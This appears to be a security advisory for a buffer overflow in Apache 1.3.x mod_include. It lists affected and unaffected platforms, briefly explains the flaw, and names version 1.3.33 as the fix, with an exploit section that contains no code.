+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 7.0 sparc
+ S.u.S.E. Linux 7.0
+ Sun Cobalt ManageRaQ v2 3599BD
+ Sun Cobalt Qube3 4000WG
+ Sun Cobalt RaQ XTR 3500R
+ Sun Cobalt RaQ4 3001R
Apache Software Foundation Apache 1.3.11
Apache Software Foundation Apache 1.3.9
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ NetScreen NetScreen-Global PRO Express Policy Manager Server
+ NetScreen NetScreen-Global PRO Policy Manager Server
+ Sun Solaris 8_x86
+ Sun Solaris 8_sparc
+ Sun SunOS 5.8 _x86
+ Sun SunOS 5.8
Apache Software Foundation Apache 1.3.7 -dev
Apache Software Foundation Apache 1.3.6
+ Sun Cobalt ManageRaQ3 3000R-mr
+ Sun Cobalt RaQ3 3000R
+ Sun Cobalt Velociraptor
Apache Software Foundation Apache 1.3.4
Apache Software Foundation Apache 1.3.3
+ RedHat Linux 5.2 sparc
+ RedHat Linux 5.2 i386
+ RedHat Linux 5.2 alpha
Apache Software Foundation Apache 1.3.1
Apache Software Foundation Apache 1.3
+ Apple Mac OS X 10.3.2
+ Apple Mac OS X 10.3.1
+ Apple Mac OS X 10.3
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X 10.2.6
+ Apple Mac OS X 10.2.5
+ Apple Mac OS X 10.2.4
+ Apple Mac OS X 10.2.3
+ Apple Mac OS X 10.2.2
+ Apple Mac OS X 10.2.1
+ Apple Mac OS X 10.2
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X Server 10.3.2
+ Apple Mac OS X Server 10.3.1
+ Apple Mac OS X Server 10.3
+ Apple Mac OS X Server 10.2.8
+ Apple Mac OS X Server 10.2.7
+ Apple Mac OS X Server 10.2.6
+ Apple Mac OS X Server 10.2.5
+ Apple Mac OS X Server 10.2.4
+ Apple Mac OS X Server 10.2.3
+ Apple Mac OS X Server 10.2.2
+ Apple Mac OS X Server 10.2.1
+ Apple Mac OS X Server 10.2
+ Apple Mac OS X Server 10.1.5
+ Apple Mac OS X Server 10.1.4
+ Apple Mac OS X Server 10.1.3
+ Apple Mac OS X Server 10.1.2
+ Apple Mac OS X Server 10.1.1
+ Apple Mac OS X Server 10.1
- Microsoft Windows 2000 Professional
- Microsoft Windows NT 4.0

- Unaffected versions

Apache Software Foundation Apache 1.3.33
+ Apple Mac OS X 10.3.6
+ Apple Mac OS X 10.2.8
+ Apple Mac OS X Server 10.3.6
+ Apple Mac OS X Server 10.2.8
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1

- Vulnerability discussion

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow.

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

- Exploit

The following exploit has been made available:

- Solution

The vendor has released version 1.3.33 to address this issue.

Please see the attached vendor advisories for more information.


Sun Solaris 8_sparc

Sun Solaris 9

Sun Solaris 9_x86

Apache Software Foundation Apache 1.3

Apache Software Foundation Apache 1.3.1

Apache Software Foundation Apache 1.3.11

Apache Software Foundation Apache 1.3.12

Apache Software Foundation Apache 1.3.14

Apache Software Foundation Apache 1.3.17

Apache Software Foundation Apache 1.3.18

Apache Software Foundation Apache 1.3.19

Apache Software Foundation Apache 1.3.20

Apache Software Foundation Apache 1.3.23

Apache Software Foundation Apache 1.3.25

Apache Software Foundation Apache 1.3.26

Apache Software Foundation Apache 1.3.27

Apache Software Foundation Apache 1.3.28

Apache Software Foundation Apache 1.3.29

Apache Software Foundation Apache 1.3.3

Apache Software Foundation Apache 1.3.31

Apache Software Foundation Apache 1.3.6

Apache Software Foundation Apache 1.3.7 -dev

Apache Software Foundation Apache 1.3.9

IBM Hardware Management Console (HMC) for iSeries 3.3.2

IBM Hardware Management Console (HMC) for pSeries 3.3.2

IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0

IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0

- References
